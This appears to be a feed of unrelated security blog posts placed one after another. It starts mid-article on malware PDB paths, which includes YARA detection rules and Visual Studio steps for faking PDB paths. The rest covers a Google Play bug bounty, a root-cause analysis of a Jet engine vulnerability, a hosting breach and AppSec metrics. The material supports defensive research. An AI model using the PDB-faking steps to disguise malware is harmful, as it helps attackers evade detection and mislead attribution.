Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462

 

Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles

Text Path: C::\\QQQQQQQQ\VVVVVVVVVVVVVVVVV.pdb

Short

Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text path:

\\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb

Regin

Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, and the general public may be adopting this nouveau nomenclature long after purported Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:

APT29

Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.

ConventionEngine

We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” after the industry jokes that security vendors like to talk about their elite detection “engines,” but behind the green curtain they’re all just a code spaghetti mess of scripts and signatures, which this absolutely started as.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on Github being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy of putting full code packages right into the repositories and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, representing a considerable intelligence gain about the malware original development environment. We used what we found in the PDB itself to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on Github. But there are some other occasions too: sometimes malware source code will get inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes malware source code will be left in open directories; and sometimes malware source code will get uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2
{
    meta:
        author="@stvemillertime"
        description = "This looks for PDB files based on headers.
    strings:
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
    condition:
        $hex at 0
rule PDB_Header_V7
{
    meta:
        author="@stvemillertime"
        description = "This looks for PDB files based on headers.
    strings:
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
    condition:
        $hex at 0
}

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb
Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

This project compiled in Debug configuration by default places both the hellol.exe file and the hellol.pdb file under

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\Debug\


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio taskbar, select Project > Properties, then in the side pane select Linker > Debugging and fill the option box for “Generate Program Database File.” This option accepts Visual Studio macros so there is plenty of flexibility for scripting and creating custom build configurations for falsifying or randomizing PDB paths.


Figure 18: hellol project Properties showing defaults for the PDB path


Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw ConsoleApplication1.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. Or if built at the command line, you could specify /PDBALTPATH which can create a PDB file name that is does not rely on the file structure of the build computer.


Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to be compiled on a CI/CD server which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? For whatever reason, if there is PDB manipulation to be done, it is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talked about malware would ultimately lead to the possibility detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.

Conclusions

If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have been historically successful in using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using many of the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and they routinely label their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, outside of the descriptors of the malware development files and environment, when PDB files are present, we identified anomalies that help us identify files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

Recommended Reading and Resources

Inspiring Research
Debugging and Symbols
Debug Directory and CodeView
Debugging and Visual Studio
PDB File Structure
PDB File Tools
ConventionEngine Rules

Expanding bug bounties on Google Play

Posted by Adam Bacchus, Sebastian Porst, and Patrick Mutchler — Android Security & Privacy

[Cross-posted from the Android Developers Blog]

We’re constantly looking for ways to further improve the security and privacy of our products, and the ecosystems they support. At Google, we understand the strength of open platforms and ecosystems, and that the best ideas don’t always come from within. It is for this reason that we offer a broad range of vulnerability reward programs, encouraging the community to help us improve security for everyone. Today, we’re expanding on those efforts with some big changes to Google Play Security Reward Program (GPSRP), as well as the launch of the new Developer Data Protection Reward Program (DDPRP).

Google Play Security Reward Program Scope Increases

We are increasing the scope of GPSRP to include all apps in Google Play with 100 million or more installs. These apps are now eligible for rewards, even if the app developers don’t have their own vulnerability disclosure or bug bounty program. In these scenarios, Google helps responsibly disclose identified vulnerabilities to the affected app developer. This opens the door for security researchers to help hundreds of organizations identify and fix vulnerabilities in their apps. If the developers already have their own programs, researchers can collect rewards directly from them on top of the rewards from Google. We encourage app developers to start their own vulnerability disclosure or bug bounty program to work directly with the security researcher community.

Vulnerability data from GPSRP helps Google create automated checks that scan all apps available in Google Play for similar vulnerabilities. Affected app developers are notified through the Play Console as part of the App Security Improvement (ASI) program, which provides information on the vulnerability and how to fix it. Over its lifetime, ASI has helped more than 300,000 developers fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users until the issue is fixed.

To date, GPSRP has paid out over $265,000 in bounties. Recent scope and reward increases have resulted in $75,500 in rewards across July & August alone. With these changes, we anticipate even further engagement from the security research community to bolster the success of the program.

Introducing the Developer Data Protection Reward Program

Today, we are also launching the Developer Data Protection Reward Program. DDPRP is a bounty program, in collaboration with HackerOne, meant to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions. It recognizes the contributions of individuals who help report apps that are violating Google Play, Google API, or Google Chrome Web Store Extensions program policies.

The program aims to reward anyone who can provide verifiably and unambiguous evidence of data abuse, in a similar model as Google’s other vulnerability reward programs. In particular, the program aims to identify situations where user data is being used or sold unexpectedly, or repurposed in an illegitimate way without user consent. If data abuse is identified related to an app or Chrome extension, that app or extension will accordingly be removed from Google Play or Google Chrome Web Store. In the case of an app developer abusing access to Gmail restricted scopes, their API access will be removed. While no reward table or maximum reward is listed at this time, depending on impact, a single report could net as large as a $50,000 bounty.

As 2019 continues, we look forward to seeing what researchers find next. Thank you to the entire community for contributing to keeping our platforms and ecosystems safe. Happy bug hunting!

After “No”

Part of a privacy professional’s job is the development of processes and policies to manage the consent of an individual. When someone does consent to their information being processed, there should be a means to record that they have done so and also a way for that individual to revoke their consent or opt-out of […]

The post After “No” appeared first on Privacy Ref.

Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423

Introduction

As of July 2019, Microsoft has fixed around 43 bugs in the Jet Database Engine. McAfee has reported a couple of bugs and, so far, we have received 10 CVE’s from Microsoft. In our previous post, we discussed the root cause of CVE-2018-8423. While analyzing this CVE and patch from Microsoft, we found that there was a way to bypass it which resulted in another crash. We reported it to Microsoft and it fixed it in the January 19 patch Tuesday. This issue was assigned CVE-2019-0576. We recommend our users to install proper patches and follow proper patch management policy and keep their windows installations up to date.

In this post we will do the root cause analysis of CVE-2019-0576. To exploit this vulnerability, an attacker needs to use social engineering techniques to convince a victim to open a JavaScript file which uses an ADODB connection object to access a malicious Jet Database file. Once the malicious Jet Database file is accessed, it calls the vulnerable function in msrd3x40.dll which can lead to exploitation of this vulnerability.

Background

As mentioned in our previous post, CVE-2018-8423 can be triggered using a malicious Jet Database file and, as per the analysis, this issue was in the index number field. If the index number was too big the program would crash at the following location:

Here, ecx contains the malicious index number. On applying the Microsoft patch for CVE-2018-8423 we can see that, on opening this malicious file, we get the following error which denotes that the issue is fixed, and the crash does not occur anymore:

 

Analyzing the Patch

We decided to dig deeper and see exactly how this issue was patched. On analyzing the “msrd3x40!TblPage::CreateIndexes” function, we can see that there is a check to see if “IndexNumber” is greater than 0xFF, or 256, as can be seen below:

 

Here, the ecx which contains the index number has the malicious value of “00002300” and it is greater than 0xFF. If we see the code, there is a jump instruction. If we follow this jump instruction, we reach the following location:

We can see that there is a call to the “msrd3x40!Err::SetError” function, meaning the malicious file will not be parsed if the index value is greater than 0xFF and the program will give the error message “Unrecognized database format” and terminate.

Finding Another Issue with the Patch

By looking at the patch, it was obvious that program will terminate if the index value is greater than 0xFF, but we decided to try it with an index value “00 00 00 20” which is less than 0xFF, and we got another crash in the function “msrd3x40!Table::FindIndexFromName”, as can be seen below:

Finding the Root Cause of the New Issue

As we know, if we give any index value which is less then 0xFF, we get a crash in the function “msrd3x40!Table::FindIndexFromName”, so we decided to analyze it further to find out why that is happening.

The crash is at the following location:

It seems that program is trying to access location “[ebx+eax*4+574h]” but it is not accessible, meaning it is an Out of Bound Read issue.

This crash looks familiar as it was also seen in CVE-2018-8423, except that it was an Out of Bound Write, while this seems to be an Out of Bound Read. If we look at eax it contains “0055b7a8” which, when multiplied by 4, becomes a very large value.

If we look at the file it looks like this:

As can be seen in below image, if we parse this file, this value of “00 00 00 20” (in little endian from the above image), denotes the number of an index whose name is “ParentIDName”:

Looking at the debugger at the point of the crash, it seems that ebx+574h points to a memory location and eax contains an index value which is getting multiplied by 4. Now we need to figure out the following:

  1. What will be the value of eax that will cause the crash? We know that it should be less than 0xFF. But what would be the lowest value?
  2. What is the root cause of this issue?

On setting a breakpoint on “msrd3x40!Table::FindIndexFromName” and changing the index number to “0000001f”, (which does not cause a crash but helps with the debugging and understanding the program flow) we can see that edx contains the pointer to an index name which, in this case, is “ParentIdName”:

Debugging further we can see that the eax value comes from [ebp] and the ebp value comes from [ebx+5F4h] as can be seen below:

When we look at “ebx+5F4” we can see the following:

We can see that “ebx+5F4” contains the index number for all the indexes in the file. In our case the file has two indexes and their number are “00 00 00 01” and “00 00 00 1f”. If we carefully review the memory we can figure out that the maximum number of indices which can be stored here are 0x20, or 32:

Start location: 00718d54

Each index number is 4 bytes long. So 0x20*4 + 00718d54 = 00718DD4

After this, if we look at ebx+574+4, we can see that it contains the pointer to index names:

So, the overall memory structure is like this:

There are only 0x80 or 128 bytes available to save index name pointer at location EBX+574. Each pointer gets saved at an index number location, i.e. for index number 1 it will be saved at EBX+574+1*4, the location for index number 2 will be saved at EBX+574+2*4 and so on. (index number starts from 0).

In this case, if we give an index number which is more than 31, the program will overwrite data past 0x80 bytes, which will be at the start of the EBX+5F4 location, which is the index number from the malicious file. So, in this case, if we give the value “00 00 00 20” instead of “00 00 00 1f”, it will overwrite the index number at the EBX+5F4 location, as can be seen below:

Now the program tries to execute this instruction in “msrd3x40!Table::FindIndexFromName’

Mov ecx, dword ptr [ebx+eax*4+574h]

Here, eax contains the index number which should be “00 00 00 01” but, since it is overwritten by “0055b7a8” which is a memory address, on multiplying it with 4, it becomes a huge number and then 574h is getting added to it. So, if that memory area does not exist and the program tries to read from that memory, we get an access violation error.

So, to answer the questions we had:

  1. Any value which is less then 0xFF and greater then 0x31 will cause a crash if the resulting memory location from [ebx+eax*4+574h] is not accessible.
  2. The root cause is that an index number is getting overwritten by a memory location, causing invalid memory access in this case.

How is it Fixed by Microsoft in the Jan 19 Patch?

We again decided to analyze the patch to see how this issue was fixed. As is clear from the analysis, any value which is greater than or equal to 0x20 or 32 still causes a crash so, ideally, the patch should be checking this. Microsoft has added this check in the Jan 19 patch release, as can be seen below:

As can be seen in the above image, eax hold the index value here and it is compared with 0x20. If it is more than or equal to 0x20 the program jumps to location 72fe1c00. If we go to that location, we can see the following:

As can be seen in the above image, it calls the destructor and then calls msrd3x40!Err::SetError function and returns. So, the program will display a message saying, “Unrecognized database format” and then terminate.

Conclusion

We reported this issue to Microsoft in October 2018 and it fixed this issue in the Jan 19 patch Tuesday. It was assigned CVE-2019-0576 to this issue. We recommend our users keep their Windows installations up to date and install vendor patches on a regular basis.

McAfee Coverage:

McAfee Network Security Platform customers are protected from this vulnerability by Signature IDs 0x45251700 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2018-8423) and 0x4525890 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2019-0576).

McAfee AV detects the malicious file as BackDoor-DKI.dr .

McAfee HIPS, Generic Buffer Overflow Protection (GBOP) feature will often cover this, depending on the process used to exploit the vulnerability.

References

The post Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423 appeared first on McAfee Blogs.

14 Million Customers Affected By Hostinger Breach: How to Secure Your Data

Whether you’re a small business owner or a blogger, having an accessible website is a must. That’s why many users look to web hosting companies so they can store the files necessary for their websites to function properly. One such company is Hostinger. This popular web, cloud, and virtual private server hosting provider and domain registrar boasts over 29 million users. But according to TechCrunch, the company recently disclosed that it detected unauthorized access to a database containing information on 14 million customers.

Let’s dive into the details of this breach. Hostinger received an alert on Friday that a server had been accessed by an unauthorized third party. The server contained an authorization token allowing the alleged hacker to obtain further access and escalate privileges to the company’s systems, including an API (application programming interface) database. An API database defines the rules for interacting with a particular web server for a specific use. In this case, the API server that was breached was used to query the details about clients and their accounts. The database included non-financial information including customer usernames, email addresses, hashed passwords, first names, and IP addresses.

Since the breach, Hostinger stated that it has identified the origin of the unauthorized access and the vulnerable system has since been secured. As a precaution, the company reset all user passwords and is in contact with respective authorities to further investigate the situation.

Although no financial data was exposed in this breach, it’s possible that cybercriminals can use the data from the exposed server to carry out several other malicious schemes. To protect your data from these cyberattacks, check out the following tips:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your accounts for unusual activity. This will help you stop fraudulent activity in its tracks.
  • Reset your password. Even if your password wasn’t automatically reset by Hostinger, update your credentials as a precautionary measure.
  • Practice good password hygiene. A cybercriminal can crack hashed passwords, such as the ones exposed in this breach, and use the information to access other accounts using the same password. To avoid this, make sure to create a strong, unique password for each of your online accounts.

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 14 Million Customers Affected By Hostinger Breach: How to Secure Your Data appeared first on McAfee Blogs.

Should You Be Measuring Flaw Rate?

Metrics — or perhaps more accurately, the right metrics — are crucial for understanding what’s really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization’s current state, and also show what progress it’s making in achieving its objectives. 

We typically recommend our customers measure their compliance against their own internal AppSec policy, plus scan activity, flaw prevalence, and time to resolve. 

Flaw rate is another metric you might want to consider tracking. Although this would be a secondary metric, unlike the primary ones listed above, flaw rate, which allows you to do a before-and-after flaw comparison for an application, provides insight into how your rate of security findings is improving over time. Veracode analytics allows you to create the flaw rate metric by using a formula and adding it to your chart in order to visualize the rate alongside any other data you are reporting – such as flaw rate per application, first scan vs most recent scan, or flaw rate per an application per severity of the finding.

Keep in mind that this metric, as with flaws per MB, can vary significantly based on the size of the codebase. A monolithic, legacy application is going to have a much different flaw rate (and flaw density as measured by flaws per MB) than a small, new microservice. The value lies in comparing an application’s initial flaw rate to the current flaw rate, or comparing the flaw rate for a team across several applications (again the initial flaw rate vs. the current). This allows users to get a handle on what is working – or not – for that team to help them close out security findings and reduce the number they are introducing in the first place. In this way, you could validate the impact of your AppSec eLearning or other trainings. I would caution against comparing flaw rate (again much like flaws per MB) between teams or between business units as this won’t directly provide much actionable insights beyond which one is doing better. 

Note that this metric will not produce an accurate gauge of your program’s success. Since it is applicable only to static analysis, it doesn’t take all testing techniques into account. Policy compliance is ultimately the best metric for measuring and reporting on the overall progress of your program.

But you could use flaw rate as an additional data point, alongside the following metrics, when reporting on the effectiveness or progress of your AppSec program:

Policy compliance: Your application security policy should stem from an analysis of your entire application inventory. From there, you assign groups of applications different risk categories or ratings by asking questions such as:

  • Do these applications touch PII?
  • Are they Internet-facing?
  • What would be the impact of a compromise to this system (i.e., are they business critical)?

Based on those answers, you can determine which scan frequency and testing types are required, as well as which types or severities of flaws to disallow: an Internet-facing application that contains PII will have a different risk categorization from an internal chat service and thus should be held to a different standard for security.

Additionally, this risk rating will determine frequency of scanning requirements. Low-risk functionality that is rarely updated does not need to be scanned every week, but that Internet-facing/PII app may require a scan for every commit.

Average time to resolve: Many application testing solutions focus on scan activity rather than addressing results. While apps need to be scanned, fixing those security findings in a timely manner is a better mechanism for evaluating your application security program. Time to resolve provides visibility into how many days it takes for a finding to be closed after it is first discovered, helping security teams better understand where there may be bottlenecks in the development and security process.

Flaw prevalence: This metric spotlights how common a risk is within a particular industry or business. It helps an organization prioritize threats such as SQL injection, Cross-Site Scripting (XSS), cryptographic issues, and CRLF injection based on real-world impact.

Learn more about flaw rate

For detailed instructions on measuring flaw rate, please see this article in the Veracode Community.

Trust but Verify

Trust but verify — what are we talking about here?  Asking which of two pups tore apart the couch pillows?  My teenager’s story of why they missed their curfew?  An individual’s identity for a Data Subject Access Request (or individual rights request based on your privacy geography)?  Or, maybe it’s a vendor’s claim of protecting […]

The post Trust but Verify appeared first on Privacy Ref.

The real impact: how cybercrime affects more of your business than you think

Some businesses – usually those that have never experienced any kind of major IT incident – think of cybercrime as an inconvenience. They may believe that if their company is hacked it will cause some disruption and perhaps an embarrassing news story, but that ultimately the breach will have only a minor effect.

However, the truth is that cybercrime can have a huge range of unexpected consequences. Here we take a lot of the real impact of a breach – cybercrime might affect you a lot more than you think.

It loses customer confidence

When you suffer a cyberattack it becomes common knowledge very quickly. Whether your site is taken offline or Google places a ‘hacked site’ warning against you, customers will learn fast that you have been compromised. And when a potential customer hears that you have been breached, they will immediately associate you with the attack, deeming your site to be unsafe to use.

Under the General Data Protection Regulation (GDPR) it is also a legal requirement for you to inform any customers whose data has been affected by the breach within 72 hours of becoming aware of the breach. This goes further to lose your confidence with those customers who have already used your services or bought from your site.

It costs you sales

No business wants to lose the confidence of its customers, mostly importantly because it will naturally have an effect on your sales. If – in the eyes of your customers – your site can’t be trusted, they will stop using it and move on to a competitor. This means that before you take anything else into account, you will be losing business simply due to the fact that you have been a victim of cybercrime.

Of course, if the cybercrime takes your website offline, you will also lose any potential transaction over that period – but the more crucial factor is the long-term effect of customers believing that you are not longer safe to buy from.

It costs a lot of money

Cyber attacks can be extremely costly for a variety of reasons. We have already talked about the kind of disruption to trading that will occur when any kind of cybercrime takes place, but it is actually a lot more complicated than that. Firstly, many forms of cybercrime will directly steal money from a business. This could come in the form of a phishing attack on a member of staff, or even a business email compromise attack.

However, there are also other costs to consider such as the financial ramifications of dealing with the hack and securing your business. And of course, any trust that is lost in your partners or suppliers can lead to you losing them.

It weakens your SEO efforts

You might not realise it, but cybercrime can have a serious impact on your search engine optimisation (SEO). There are many reasons for this – firstly, if Google believes your site is hacked, it can place a ‘hacked site’ warning in the listings. Additionally, many hacks will actually alter or steal content from your site, and website content is one of the most important ranking factors in the eyes of all search engines.

Another important factor is downtime. If Google sees that your website is down for a significant period of time, this is a negative ranking factor, and can see your site sliding. Any cybercrime will cause downtime, as you will need to take your site offline in order to fix the issues and return it to normal.

It causes problems with compliance

We have already mentioned the GDPR in this article, and how it can force you to disclose cyber breaches to any affected individuals. However, it is important to remember that compliance with the GDPR and regulations can become an issue if you suffer a cyberattack.

Under the GDPR, businesses are required to take appropriate steps to protect themselves against attacks, in order to secure the private information that they hold on customers. Failing to do can put you at risk of heavy fines from the ICO.

It loses your intellectual property

Another extremely common occurrence during a cyberattack is that intellectual property will be stolen. Given the incredible value of IP to some businesses, such as in technology or pharmaceutical firms, it can be easy to see how stolen IP could make a business unsustainable.

If your organisation relies upon the secrecy of its IP, then you need to make sure you are taking appropriate steps to defend that IP against cybercrime.

The post The real impact: how cybercrime affects more of your business than you think appeared first on CyberDB.

How to Spring Clean Your Digital Life

With winter almost gone, now is the perfect time to start planning your annual spring clean. When we think about our yearly sort out, most of us think about decluttering our chaotic linen cupboards or the wardrobes that we can’t close. But if you want to minimise the opportunities for a hacker to get their hands on your private online information then a clean-up of your digital house (aka your online life) is absolutely essential.

Not Glamourous but Necessary

I totally accept that cleaning up your online life isn’t exciting but let me assure you it is a must if you want to avoid becoming a victim of identity theft.

Think about how much digital clutter we have accumulated over the years? Many of us have multiple social media, messaging and email accounts. And don’t forget about all the online newsletters and ‘accounts’ we have signed up for with stores and online sites? Then there are the apps and programs we no longer use.

Well, all of this can be a liability. Holding onto accounts and files you don’t need exposes you to all sorts of risks. Your devices could be stolen or hacked or, a data breach could mean that your private details are exposed quite possibly on the Dark Web. In short, the less information that there is about you online, the better off you are.

Digital clutter can be distracting, exhausting to manage and most importantly, detrimental to your online safety. A thorough digital spring clean will help to protect your important, online personal information from cybercriminals.

What is Identity Theft?

